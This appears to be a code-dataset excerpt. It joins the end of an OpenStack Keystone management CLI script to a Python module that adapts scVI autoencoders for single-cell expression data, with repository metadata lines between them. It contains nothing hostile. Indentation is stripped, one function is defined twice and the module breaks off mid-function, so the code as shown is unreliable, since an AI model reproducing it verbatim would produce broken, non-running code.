# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import json
import sys
import textwrap
from keystone import config
from keystone.common import utils
CONF = config.CONF
CONF.set_usage('%prog COMMAND')
class BaseApp(object):
def __init__(self, argv=None):
self.argv = argv
def run(self):
return self.main()
def missing_param(self, param):
print 'Missing parameter: %s' % param
CONF.print_help()
print_commands(CMDS)
sys.exit(1)
class DbSync(BaseApp):
"""Sync the database."""
name = 'db_sync'
def __init__(self, *args, **kw):
super(DbSync, self).__init__(*args, **kw)
def main(self):
for k in ['identity', 'catalog', 'policy', 'token']:
driver = utils.import_object(getattr(CONF, k).driver)
if hasattr(driver, 'db_sync'):
driver.db_sync()
class ImportLegacy(BaseApp):
"""Import a legacy database."""
name = 'import_legacy'
def __init__(self, *args, **kw):
super(ImportLegacy, self).__init__(*args, **kw)
def main(self):
from keystone.common.sql import legacy
if len(self.argv) < 2:
return self.missing_param('old_db')
old_db = self.argv[1]
migration = legacy.LegacyMigration(old_db)
migration.migrate_all()
class ExportLegacyCatalog(BaseApp):
"""Export the service catalog from a legacy database."""
name = 'export_legacy_catalog'
def __init__(self, *args, **kw):
super(ExportLegacyCatalog, self).__init__(*args, **kw)
def main(self):
from keystone.common.sql import legacy
if len(self.argv) < 2:
return self.missing_param('old_db')
old_db = self.argv[1]
migration = legacy.LegacyMigration(old_db)
print '\n'.join(migration.dump_catalog())
class ImportNovaAuth(BaseApp):
"""Import a dump of nova auth data into keystone."""
name = 'import_nova_auth'
def __init__(self, *args, **kw):
super(ImportNovaAuth, self).__init__(*args, **kw)
def main(self):
from keystone.common.sql import nova
if len(self.argv) < 2:
return self.missing_param('dump_file')
dump_file = self.argv[1]
dump_data = json.loads(open(dump_file).read())
nova.import_auth(dump_data)
CMDS = {'db_sync': DbSync,
'import_legacy': ImportLegacy,
'export_legacy_catalog': ExportLegacyCatalog,
'import_nova_auth': ImportNovaAuth,
}
def print_commands(cmds):
print
print 'Available commands:'
o = []
max_length = max([len(k) for k in cmds]) + 2
for k, cmd in sorted(cmds.iteritems()):
initial_indent = '%s%s: ' % (' ' * (max_length - len(k)), k)
tw = textwrap.TextWrapper(initial_indent=initial_indent,
subsequent_indent=' ' * (max_length + 2),
width=80)
o.extend(tw.wrap(
(cmd.__doc__ and cmd.__doc__ or 'no docs').strip().split('\n')[0]))
print '\n'.join(o)
def run(cmd, args):
return CMDS[cmd](argv=args).run()
def main(argv=None, config_files=None):
CONF.reset()
args = CONF(config_files=config_files, args=argv)
if len(args) < 2:
CONF.print_help()
print_commands(CMDS)
sys.exit(1)
cmd = args[1]
if cmd in CMDS:
return run(cmd, (args[:1] + args[2:]))
else:
print_commands(CMDS)
sys.exit("Unknown command: %s" % cmd)
|
[
"c@c-Latitude-E6410.(none)"
] |
c@c-Latitude-E6410.(none)
|
0d35174dbee1362ac380bf5e44b079d867cc538d
|
33ccdaa6293162511c4ad74284f69b2bd6451044
|
/pyscutils/scvi_utils.py
|
047d3b60725774029d64a5f1cef0c6622d33e66e
|
[
"BSD-3-Clause"
] |
permissive
|
saketkc/pyscutils
|
f3f9199f0c2e3954dc79369b99f4612acd9cf0c2
|
282a6cc707deaee80ab8ebc5596d25b9e21d6ffb
|
refs/heads/master
| 2023-01-23T02:26:28.599751 | 2020-11-19T00:31:07 | 2020-11-19T00:31:07 | 297,775,606 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 50,655 |
py
|
import os
import warnings
warnings.simplefilter("ignore")
import shutil
from typing import Dict, Iterable, List, Tuple
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import proplot
import scanpy as sc
import scvi
import seaborn as sns
import torch
import torch.nn as nn
import torch.nn.functional as F  # needed for F.linear (gene-batch / gene-label dispersion)
from adjustText import adjust_text
from scvi import set_seed
from scvi.dataset import AnnDatasetFromAnnData
from scvi.models.utils import one_hot
from scvi.inference import UnsupervisedTrainer, load_posterior
from scvi.models.distributions import (
NegativeBinomial,
Poisson,
ZeroInflatedNegativeBinomial,
)
from scvi.models.log_likelihood import log_nb_positive, log_zinb_positive
from scvi.models.modules import DecoderSCVI, Encoder, FCLayers, LinearDecoderSCVI
from scvi.models.vae import LDVAE, VAE
from torch.distributions import Normal
from torch.distributions import kl_divergence as kl
## Modifications from scVI code marked with '################ ===>'
def compute_scvi_latent(
adata: sc.AnnData,
n_latent: int = 50,
n_encoder: int = 1,
n_epochs: int = 200,
lr: float = 1e-3,
use_batches: bool = False,
use_cuda: bool = False,
linear: bool = False,
cell_offset: str = "none",
gene_offset: str = "none",
ldvae_bias: bool = False,
reconstruction_loss: str = "zinb",
hvg_genes=None,
) -> Tuple[scvi.inference.Posterior, np.ndarray]:
"""Train and return a scVI model and sample a latent space
:param adata: sc.AnnData object non-normalized
:param n_latent: dimension of the latent space
:param n_epochs: number of training epochs
:param lr: learning rate
:param use_batches
:param use_cuda
:return: (scvi.Posterior, latent_space)
"""
# Convert easily to scvi dataset
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
# print(scviDataset.X.shape)
# print(scviDataset.X[:10,:5])
# print(scviDataset.raw.X.shape)
if isinstance(scviDataset.X, np.ndarray):
X = scviDataset.X
else:
X = scviDataset.X.toarray()
gene_mean = torch.mean(
torch.from_numpy(X).float().to(torch.cuda.current_device()), dim=1
)
cell_mean = torch.mean(
torch.from_numpy(X).float().to(torch.cuda.current_device()), dim=0
)
# Train a model
if not linear:
vae = VAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
reconstruction_loss=reconstruction_loss,
)
else:
vae = LDVAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers_encoder=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
bias=ldvae_bias,
reconstruction_loss=reconstruction_loss,
)
trainer = UnsupervisedTrainer(vae, scviDataset, train_size=1.0, use_cuda=use_cuda)
trainer.train(n_epochs=n_epochs, lr=lr)
# Extract latent space
posterior = trainer.create_posterior(
trainer.model, scviDataset, indices=np.arange(len(scviDataset))
).sequential()
latent, _, _ = posterior.get_latent()
return posterior, latent, vae, trainer
# Decoder
class DecoderSCVI(nn.Module):
"""Decodes data from latent space of ``n_input`` dimensions ``n_output``
dimensions using a fully-connected neural network of ``n_hidden`` layers.
Parameters
----------
n_input
The dimensionality of the input (latent space)
n_output
The dimensionality of the output (data space)
n_cat_list
A list containing the number of categories
for each category of interest. Each category will be
included using a one-hot encoding
n_layers
The number of fully-connected hidden layers
n_hidden
The number of nodes per hidden layer
dropout_rate
Dropout rate to apply to each of the hidden layers
Returns
-------
"""
def __init__(
self,
n_input: int,
n_output: int,
n_cat_list: Iterable[int] = None,
n_layers: int = 1,
n_hidden: int = 128,
):
super().__init__()
self.px_decoder = FCLayers(
n_in=n_input,
n_out=n_hidden,
n_cat_list=n_cat_list,
n_layers=n_layers,
n_hidden=n_hidden,
dropout_rate=0,
)
# mean gamma
self.px_scale_decoder = nn.Sequential(
nn.Linear(n_hidden, n_output), nn.Softmax(dim=-1)
)
# dispersion: here we only deal with gene-cell dispersion case
self.px_r_decoder = nn.Linear(n_hidden, n_output)
# dropout
self.px_dropout_decoder = nn.Linear(n_hidden, n_output)
def forward(
self, dispersion: str, z: torch.Tensor, library: torch.Tensor, *cat_list: int
):
"""The forward computation for a single sample.
#. Decodes the data from the latent space using the decoder network
#. Returns parameters for the ZINB distribution of expression
#. If ``dispersion != 'gene-cell'`` then value for that param will be ``None``
Parameters
----------
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
z :
tensor with shape ``(n_input,)``
library
library size
cat_list
list of category membership(s) for this sample
Returns
-------
4-tuple of :py:class:`torch.Tensor`
parameters for the ZINB distribution of expression
"""
# The decoder returns values for the parameters of the ZINB distribution
px = self.px_decoder(z, *cat_list)
px_scale = self.px_scale_decoder(px)
px_dropout = self.px_dropout_decoder(px)
# Clamp to high value: exp(12) ~ 160000 to avoid nans (computational stability)
px_rate = (torch.exp(library)) * px_scale # torch.clamp( , max=12)
px_r = self.px_r_decoder(px) if dispersion == "gene-cell" else None
return px_scale, px_r, px_rate, px_dropout
## Modifications from scVI code marked with '################ ===>'
class DecoderSCVIGeneCell(DecoderSCVI):
"""Decodes data from latent space of ``n_input`` dimensions ``n_output``
dimensions using a fully-connected neural network of ``n_hidden`` layers.
Parameters
----------
n_input
The dimensionality of the input (latent space)
n_output
The dimensionality of the output (data space)
n_cat_list
A list containing the number of categories
for each category of interest. Each category will be
included using a one-hot encoding
n_layers
The number of fully-connected hidden layers
n_hidden
The number of nodes per hidden layer
dropout_rate
Dropout rate to apply to each of the hidden layers
Returns
-------
"""
def __init__(
self,
n_input: int,
n_output: int,
n_cat_list: Iterable[int] = None,
n_layers: int = 1,
n_hidden: int = 128,
):
super().__init__(n_input, n_output, n_cat_list, n_layers, n_hidden)
def forward(
self,
dispersion: str,
z: torch.Tensor,
library: torch.Tensor,
*cat_list: int,
cell_offset: torch.Tensor,
gene_offset: torch.Tensor,
dispersion_clamp: list,
):
"""The forward computation for a single sample.
#. Decodes the data from the latent space using the decoder network
#. Returns parameters for the ZINB distribution of expression
#. If ``dispersion != 'gene-cell'`` then value for that param will be ``None``
Parameters
----------
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
z :
tensor with shape ``(n_input,)``
library
library size
cat_list
list of category membership(s) for this sample
Returns
-------
4-tuple of :py:class:`torch.Tensor`
parameters for the ZINB distribution of expression
"""
# The decoder returns values for the parameters of the ZINB distribution
px = self.px_decoder(z, *cat_list)
px_scale = self.px_scale_decoder(px)
px_dropout = self.px_dropout_decoder(px)
        # Clamp to high value: exp(12) ~ 160000 to avoid nans (computational stability)
        ################ ===>
        cell_offset = torch.reshape(cell_offset, (cell_offset.shape[0], 1))
        px_rate = (
            (torch.exp(library) * (cell_offset)) * px_scale * gene_offset
        ) # torch.clamp( , max=12)
# px_rate = cell_offset #torch.exp(library) + cell_mean * px_scale # torch.clamp( , max=12)
# px_rate = torch.exp(library + cell_mean) * px_scale # torch.clamp( , max=12)
px_r = self.px_r_decoder(px) if dispersion == "gene-cell" else None
if dispersion == "gene-cell" and dispersion_clamp:
px_r = torch.clamp(px_r, min=dispersion_clamp[0], max=dispersion_clamp[1])
return px_scale, px_r, px_rate, px_dropout
class LinearDecoderSCVIGeneCell(nn.Module):
def __init__(
self,
n_input: int,
n_output: int,
n_cat_list: Iterable[int] = None,
use_batch_norm: bool = True,
bias: bool = False,
):
super(LinearDecoderSCVIGeneCell, self).__init__()
# mean gamma
self.factor_regressor = FCLayers(
n_in=n_input,
n_out=n_output,
n_cat_list=n_cat_list,
n_layers=1,
use_relu=False,
use_batch_norm=use_batch_norm,
bias=bias,
dropout_rate=0,
)
# dropout
self.px_dropout_decoder = FCLayers(
n_in=n_input,
n_out=n_output,
n_cat_list=n_cat_list,
n_layers=1,
use_relu=False,
use_batch_norm=use_batch_norm,
bias=bias,
dropout_rate=0,
)
def forward(
self,
dispersion: str,
z: torch.Tensor,
library: torch.Tensor,
*cat_list: int,
cell_offset: torch.Tensor,
gene_offset: torch.Tensor,
):
# The decoder returns values for the parameters of the ZINB distribution
raw_px_scale = self.factor_regressor(z, *cat_list)
px_scale = torch.softmax(raw_px_scale, dim=-1)
px_dropout = self.px_dropout_decoder(z, *cat_list)
##px_rate = torch.exp(library) * px_scale
################ ===>
cell_offset = torch.reshape(cell_offset, (cell_offset.shape[0], 1))
px_rate = (
(torch.exp(library) * cell_offset) * px_scale * gene_offset
) # torch.clamp( , max=12)
px_r = None
return px_scale, px_r, px_rate, px_dropout
# VAEGeneCell model
class VAEGeneCell(nn.Module):
"""Variational auto-encoder model.
    This is an implementation of the scVI model described in [Lopez18]_
Parameters
----------
n_input
Number of input genes
n_batch
Number of batches, if 0, no batch correction is performed.
n_labels
Number of labels
n_hidden
Number of nodes per hidden layer
n_latent
Dimensionality of the latent space
n_layers
Number of hidden layers used for encoder and decoder NNs
dropout_rate
Dropout rate for neural networks
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
log_variational
Log(data+1) prior to encoding for numerical stability. Not normalization.
reconstruction_loss
One of
* ``'nb'`` - Negative binomial distribution
* ``'zinb'`` - Zero-inflated negative binomial distribution
* ``'poisson'`` - Poisson distribution
Examples
--------
>>> gene_dataset = CortexDataset()
>>> vae = VAE(gene_dataset.nb_genes, n_batch=gene_dataset.n_batches * False,
... n_labels=gene_dataset.n_labels)
"""
def __init__(
self,
n_input: int,
n_batch: int = 0,
n_labels: int = 0,
n_hidden: int = 128,
n_latent: int = 10,
n_layers: int = 1,
dropout_rate: float = 0.1,
dispersion: str = "gene",
log_variational: bool = True,
reconstruction_loss: str = "zinb",
latent_distribution: str = "normal",
cell_offset: str = "none", ################ ===>
gene_offset: str = "none", ################ ===>
dispersion_clamp: list = [],
beta_disentanglement: float = 1.0,
kl_type: str = "reverse",
):
super().__init__()
self.dispersion = dispersion
self.n_latent = n_latent
self.log_variational = log_variational
self.reconstruction_loss = reconstruction_loss
# Automatically deactivate if useless
self.n_batch = n_batch
self.n_labels = n_labels
self.latent_distribution = latent_distribution
################ ===>
self.cell_offset = cell_offset
self.gene_offset = gene_offset
self.dispersion_clamp = dispersion_clamp
self.beta_disentanglement = beta_disentanglement
self.kl_type = kl_type
if self.dispersion == "gene":
self.px_r = torch.nn.Parameter(torch.randn(n_input))
elif self.dispersion == "gene-batch":
self.px_r = torch.nn.Parameter(torch.randn(n_input, n_batch))
elif self.dispersion == "gene-label":
self.px_r = torch.nn.Parameter(torch.randn(n_input, n_labels))
elif self.dispersion == "gene-cell":
pass
else:
            raise ValueError(
                "dispersion must be one of ['gene', 'gene-batch',"
                " 'gene-label', 'gene-cell'], but input was "
                "{}".format(self.dispersion)
            )
# z encoder goes from the n_input-dimensional data to an n_latent-d
# latent space representation
self.z_encoder = Encoder(
n_input,
n_latent,
n_layers=n_layers,
n_hidden=n_hidden,
dropout_rate=dropout_rate,
distribution=latent_distribution,
)
# l encoder goes from n_input-dimensional data to 1-d library size
self.l_encoder = Encoder(
n_input, 1, n_layers=1, n_hidden=n_hidden, dropout_rate=dropout_rate
)
# decoder goes from n_latent-dimensional space to n_input-d data
################ ===>
self.decoder = DecoderSCVIGeneCell(
n_latent,
n_input,
n_cat_list=[n_batch],
n_layers=n_layers,
n_hidden=n_hidden,
)
def get_latents(self, x, y=None) -> torch.Tensor:
"""Returns the result of ``sample_from_posterior_z`` inside a list
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
Returns
-------
type
one element list of tensor
"""
return [self.sample_from_posterior_z(x, y)]
def sample_from_posterior_z(
self, x, y=None, give_mean=False, n_samples=5000
) -> torch.Tensor:
"""Samples the tensor of latent values from the posterior
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
give_mean
is True when we want the mean of the posterior distribution rather than sampling (Default value = False)
n_samples
how many MC samples to average over for transformed mean (Default value = 5000)
Returns
-------
type
tensor of shape ``(batch_size, n_latent)``
"""
if self.log_variational:
x = torch.log(1 + x)
qz_m, qz_v, z = self.z_encoder(x, y) # y only used in VAEC
if give_mean:
if self.latent_distribution == "ln":
samples = Normal(qz_m, qz_v.sqrt()).sample([n_samples])
z = self.z_encoder.z_transformation(samples)
z = z.mean(dim=0)
else:
z = qz_m
return z
def sample_from_posterior_l(self, x) -> torch.Tensor:
"""Samples the tensor of library sizes from the posterior
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)``
Returns
-------
type
tensor of shape ``(batch_size, 1)``
"""
if self.log_variational:
x = torch.log(1 + x)
ql_m, ql_v, library = self.l_encoder(x)
return library
def get_sample_scale(
self, x, batch_index=None, y=None, n_samples=1, transform_batch=None
) -> torch.Tensor:
"""Returns the tensor of predicted frequencies of expression
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
batch_index
array that indicates which batch the cells belong to with shape ``batch_size`` (Default value = None)
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
n_samples
number of samples (Default value = 1)
transform_batch
int of batch to transform samples into (Default value = None)
Returns
-------
type
tensor of predicted frequencies of expression with shape ``(batch_size, n_input)``
"""
return self.inference(
x,
batch_index=batch_index,
y=y,
n_samples=n_samples,
transform_batch=transform_batch,
)["px_scale"]
def get_sample_rate(
self, x, batch_index=None, y=None, n_samples=1, transform_batch=None
) -> torch.Tensor:
"""Returns the tensor of means of the negative binomial distribution
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
batch_index
array that indicates which batch the cells belong to with shape ``batch_size`` (Default value = None)
n_samples
number of samples (Default value = 1)
transform_batch
int of batch to transform samples into (Default value = None)
Returns
-------
type
tensor of means of the negative binomial distribution with shape ``(batch_size, n_input)``
"""
return self.inference(
x,
batch_index=batch_index,
y=y,
n_samples=n_samples,
transform_batch=transform_batch,
)["px_rate"]
def get_reconstruction_loss(
self, x, px_rate, px_r, px_dropout, **kwargs
) -> torch.Tensor:
# Reconstruction Loss
px_rate_ = px_rate
if self.reconstruction_loss == "zinb":
reconst_loss = (
-ZeroInflatedNegativeBinomial(
mu=px_rate_, theta=px_r, zi_logits=px_dropout
)
.log_prob(x)
.sum(dim=-1)
)
elif self.reconstruction_loss == "nb":
reconst_loss = (
-NegativeBinomial(mu=px_rate_, theta=px_r).log_prob(x).sum(dim=-1)
)
elif self.reconstruction_loss == "poisson":
reconst_loss = -Poisson(px_rate_).log_prob(x).sum(dim=-1)
return reconst_loss
def inference(
self, x, batch_index=None, y=None, n_samples=1, transform_batch=None, **kwargs
) -> Dict[str, torch.Tensor]:
"""Helper function used in forward pass"""
x_ = x
if self.log_variational:
x_ = torch.log(1 + x_)
# Sampling
qz_m, qz_v, z = self.z_encoder(x_, y)
ql_m, ql_v, library = self.l_encoder(x_)
if n_samples > 1:
qz_m = qz_m.unsqueeze(0).expand((n_samples, qz_m.size(0), qz_m.size(1)))
qz_v = qz_v.unsqueeze(0).expand((n_samples, qz_v.size(0), qz_v.size(1)))
# when z is normal, untran_z == z
untran_z = Normal(qz_m, qz_v.sqrt()).sample()
z = self.z_encoder.z_transformation(untran_z)
ql_m = ql_m.unsqueeze(0).expand((n_samples, ql_m.size(0), ql_m.size(1)))
ql_v = ql_v.unsqueeze(0).expand((n_samples, ql_v.size(0), ql_v.size(1)))
library = Normal(ql_m, ql_v.sqrt()).sample()
if transform_batch is not None:
dec_batch_index = transform_batch * torch.ones_like(batch_index)
else:
dec_batch_index = batch_index
################ ===>
try: # if use_cuda:
cell_offset = torch.ones(x.shape[0]).to(torch.cuda.current_device())
gene_offset = torch.ones(x.shape[1]).to(torch.cuda.current_device())
except:
cell_offset = torch.ones(x.shape[0])
gene_offset = torch.ones(x.shape[1])
if self.cell_offset == "count":
cell_offset = torch.sum(x, dim=1)
elif self.cell_offset == "mean":
cell_offset = torch.mean(x, dim=1)
if self.gene_offset == "count":
gene_offset = torch.sum(x, dim=0)
elif self.gene_offset == "mean":
gene_offset = torch.mean(x, dim=0)
px_scale, px_r, px_rate, px_dropout = self.decoder(
self.dispersion,
z,
library,
dec_batch_index,
y,
cell_offset=cell_offset, ################ ===>
gene_offset=gene_offset, ################ ===>
dispersion_clamp=self.dispersion_clamp,
)
if self.dispersion == "gene-label":
px_r = F.linear(
one_hot(y, self.n_labels), self.px_r
) # px_r gets transposed - last dimension is nb genes
elif self.dispersion == "gene-batch":
px_r = F.linear(one_hot(dec_batch_index, self.n_batch), self.px_r)
elif self.dispersion == "gene":
px_r = self.px_r
px_r = torch.exp(px_r)
return dict(
px_scale=px_scale,
px_r=px_r,
px_rate=px_rate,
px_dropout=px_dropout,
qz_m=qz_m,
qz_v=qz_v,
z=z,
ql_m=ql_m,
ql_v=ql_v,
library=library,
)
def forward(
self, x, local_l_mean, local_l_var, batch_index=None, y=None
) -> Tuple[torch.Tensor, torch.Tensor]:
"""Returns the reconstruction loss and the KL divergences
Parameters
----------
x
tensor of values with shape (batch_size, n_input)
local_l_mean
tensor of means of the prior distribution of latent variable l
with shape (batch_size, 1)
local_l_var
            tensor of variances of the prior distribution of latent variable l
with shape (batch_size, 1)
batch_index
array that indicates which batch the cells belong to with shape ``batch_size`` (Default value = None)
y
tensor of cell-types labels with shape (batch_size, n_labels) (Default value = None)
Returns
-------
type
the reconstruction loss and the Kullback divergences
"""
# Parameters for z latent distribution
outputs = self.inference(x, batch_index, y)
qz_m = outputs["qz_m"]
qz_v = outputs["qz_v"]
ql_m = outputs["ql_m"]
ql_v = outputs["ql_v"]
px_rate = outputs["px_rate"]
px_r = outputs["px_r"]
px_dropout = outputs["px_dropout"]
# KL Divergence
mean = torch.zeros_like(qz_m)
scale = torch.ones_like(qz_v)
# only use it on mean
if self.kl_type == "reverse":
kl_divergence_z = kl(
Normal(qz_m, torch.sqrt(qz_v)), Normal(mean, scale)
).sum(dim=1)
elif self.kl_type == "forward":
kl_divergence_z = kl(
Normal(mean, scale), Normal(qz_m, torch.sqrt(qz_v))
).sum(dim=1)
elif self.kl_type == "symmetric":
p_sum_q = Normal(mean + qz_m, scale + torch.sqrt(qz_v))
kl_divergence_z_f = kl(Normal(mean, scale), p_sum_q).sum(dim=1)
kl_divergence_z_r = kl(Normal(qz_m, torch.sqrt(qz_v)), p_sum_q).sum(dim=1)
kl_divergence_z = 0.5 * (kl_divergence_z_f + kl_divergence_z_r)
kl_divergence_l = kl(
Normal(ql_m, torch.sqrt(ql_v)),
Normal(local_l_mean, torch.sqrt(local_l_var)),
).sum(dim=1)
kl_divergence = kl_divergence_z * self.beta_disentanglement
reconst_loss = self.get_reconstruction_loss(
x,
px_rate,
px_r,
px_dropout,
)
return reconst_loss + kl_divergence_l, kl_divergence, 0.0
class LDVAEGeneCell(VAEGeneCell):
"""Linear-decoded Variational auto-encoder model.
Implementation of [Svensson20]_.
This model uses a linear decoder, directly mapping the latent representation
to gene expression levels. It still uses a deep neural network to encode
the latent representation.
Compared to standard VAE, this model is less powerful, but can be used to
inspect which genes contribute to variation in the dataset. It may also be used
for all scVI tasks, like differential expression, batch correction, imputation, etc.
However, batch correction may be less powerful as it assumes a linear model.
Parameters
----------
n_input
Number of input genes
n_batch
Number of batches
n_labels
Number of labels
n_hidden
Number of nodes per hidden layer (for encoder)
n_latent
Dimensionality of the latent space
n_layers_encoder
Number of hidden layers used for encoder NNs
dropout_rate
Dropout rate for neural networks
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
log_variational
Log(data+1) prior to encoding for numerical stability. Not normalization.
reconstruction_loss
One of
* ``'nb'`` - Negative binomial distribution
* ``'zinb'`` - Zero-inflated negative binomial distribution
use_batch_norm
Bool whether to use batch norm in decoder
bias
Bool whether to have bias term in linear decoder
"""
def __init__(
self,
n_input: int,
n_batch: int = 0,
n_labels: int = 0,
n_hidden: int = 128,
n_latent: int = 10,
n_layers_encoder: int = 1,
dropout_rate: float = 0.1,
dispersion: str = "gene",
log_variational: bool = True,
reconstruction_loss: str = "nb",
use_batch_norm: bool = True,
bias: bool = False,
latent_distribution: str = "normal",
cell_offset: str = "none",
gene_offset: str = "none",
):
super().__init__(
n_input,
n_batch,
n_labels,
n_hidden,
n_latent,
n_layers_encoder,
dropout_rate,
dispersion,
log_variational,
reconstruction_loss,
latent_distribution,
cell_offset, ################ ===>
gene_offset, ################ ===>
)
self.use_batch_norm = use_batch_norm
self.z_encoder = Encoder(
n_input,
n_latent,
n_layers=n_layers_encoder,
n_hidden=n_hidden,
dropout_rate=dropout_rate,
distribution=latent_distribution,
)
################ ===>
self.decoder = LinearDecoderSCVIGeneCell(
n_latent,
n_input,
n_cat_list=[n_batch],
use_batch_norm=use_batch_norm,
bias=bias,
)
@torch.no_grad()
def get_loadings(self) -> np.ndarray:
"""Extract per-gene weights (for each Z, shape is genes by dim(Z)) in the linear decoder."""
# This is BW, where B is diag(b) batch norm, W is weight matrix
if self.use_batch_norm is True:
w = self.decoder.factor_regressor.fc_layers[0][0].weight
bn = self.decoder.factor_regressor.fc_layers[0][1]
sigma = torch.sqrt(bn.running_var + bn.eps)
gamma = bn.weight
b = gamma / sigma
bI = torch.diag(b)
loadings = torch.matmul(bI, w)
else:
loadings = self.decoder.factor_regressor.fc_layers[0][0].weight
loadings = loadings.detach().cpu().numpy()
if self.n_batch > 1:
loadings = loadings[:, : -self.n_batch]
return loadings
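# Example (sketch, not part of the original module): inspecting the linear decoder
# loadings of a trained LDVAEGeneCell. Assumes `vae` is a trained LDVAEGeneCell and
# `gene_names` lists the genes it was trained on, in order.
#   loadings = pd.DataFrame(vae.get_loadings(), index=gene_names)
#   top_gene_per_factor = loadings.abs().idxmax(axis=0)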
def compute_scvi_latent(
adata: sc.AnnData,
n_latent: int = 50,
n_encoder: int = 1,
n_epochs: int = 200,
lr: float = 1e-3,
use_batches: bool = False,
use_cuda: bool = False,
linear: bool = False,
cell_offset: str = "none",
gene_offset: str = "none",
ldvae_bias: bool = False,
reconstruction_loss: str = "zinb",
dispersion: str = "gene",
hvg_genes="all",
point_size=10,
dispersion_clamp=[],
beta_disentanglement=1.0,
kl_type="reverse",
) -> Tuple[scvi.inference.Posterior, np.ndarray]:
"""Train and return a scVI model and sample a latent space
:param adata: sc.AnnData object non-normalized
:param n_latent: dimension of the latent space
:param n_epochs: number of training epochs
:param lr: learning rate
:param use_batches
:param use_cuda
:return: (scvi.Posterior, latent_space)
"""
# Convert easily to scvi dataset
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
if isinstance(scviDataset.X, np.ndarray):
X = scviDataset.X
else:
X = scviDataset.X.toarray()
# Train a model
if not linear:
vae = VAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
reconstruction_loss=reconstruction_loss,
dispersion=dispersion,
dispersion_clamp=dispersion_clamp,
beta_disentanglement=beta_disentanglement,
kl_type=kl_type,
)
else:
vae = LDVAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers_encoder=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
bias=ldvae_bias,
reconstruction_loss=reconstruction_loss,
dispersion=dispersion,
)
trainer = UnsupervisedTrainer(vae, scviDataset, train_size=1.0, use_cuda=use_cuda)
trainer.train(n_epochs=n_epochs, lr=lr)
# Extract latent space
posterior = trainer.create_posterior(
trainer.model, scviDataset, indices=np.arange(len(scviDataset))
).sequential()
latent, _, _ = posterior.get_latent()
return posterior, latent, vae, trainer
def RunVAE(
adata,
reconstruction_loss,
n_latent=30,
n_encoder=1,
linear=False,
cell_offset="none",
gene_offset="none",
ldvae=False,
ldvae_bias=False,
title_prefix="",
dispersion="gene",
hvg_genes="all",
point_size=5,
n_epochs=200,
lr=1e-3,
batch_size=1000,
use_cuda=False,
legend_loc="on data",
figsize=(10, 5),
legend_fontweight="normal",
sct_cell_pars=None,
outdir=None,
sct_gene_pars=None,
sct_model_pars_fit=None,
dispersion_clamp=[],
beta_disentanglement=1.0,
kl_type="reverse",
):
sct_gene_pars_df = pd.read_csv(sct_gene_pars, sep="\t", index_col=0)
sct_model_pars_fit_df = pd.read_csv(sct_model_pars_fit, sep="\t", index_col=0)
sct_model_paras_withgmean = sct_model_pars_fit_df.join(sct_gene_pars_df)
scvi_posterior, scvi_latent, scvi_vae, scvi_trainer = compute_scvi_latent(
adata,
n_encoder=n_encoder,
n_epochs=n_epochs,
n_latent=n_latent,
use_cuda=use_cuda,
linear=linear,
cell_offset=cell_offset,
gene_offset=gene_offset,
reconstruction_loss=reconstruction_loss,
dispersion=dispersion,
hvg_genes=hvg_genes,
dispersion_clamp=dispersion_clamp,
beta_disentanglement=beta_disentanglement,
kl_type=kl_type,
)
suffix = "_{}_{}_{}_{}".format(
cell_offset, gene_offset, reconstruction_loss, dispersion
)
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
# posterior freq of genes per cell
# scale = scvi_posterior.sequential(batch_size=batch_size).get_sample_scale()
# scale = scale.detach()
scale = scvi_posterior.get_sample_scale()
# batch_size=batch_size
for _ in range(99):
scale += scvi_posterior.get_sample_scale()
scale /= 100
scale_df = pd.DataFrame(scale)
scale_df.index = list(adata.obs_names)
scale_df.columns = list(scviDataset.gene_ids)
scale_df = scale_df.T
scvi_latent_df = pd.DataFrame(scvi_latent)
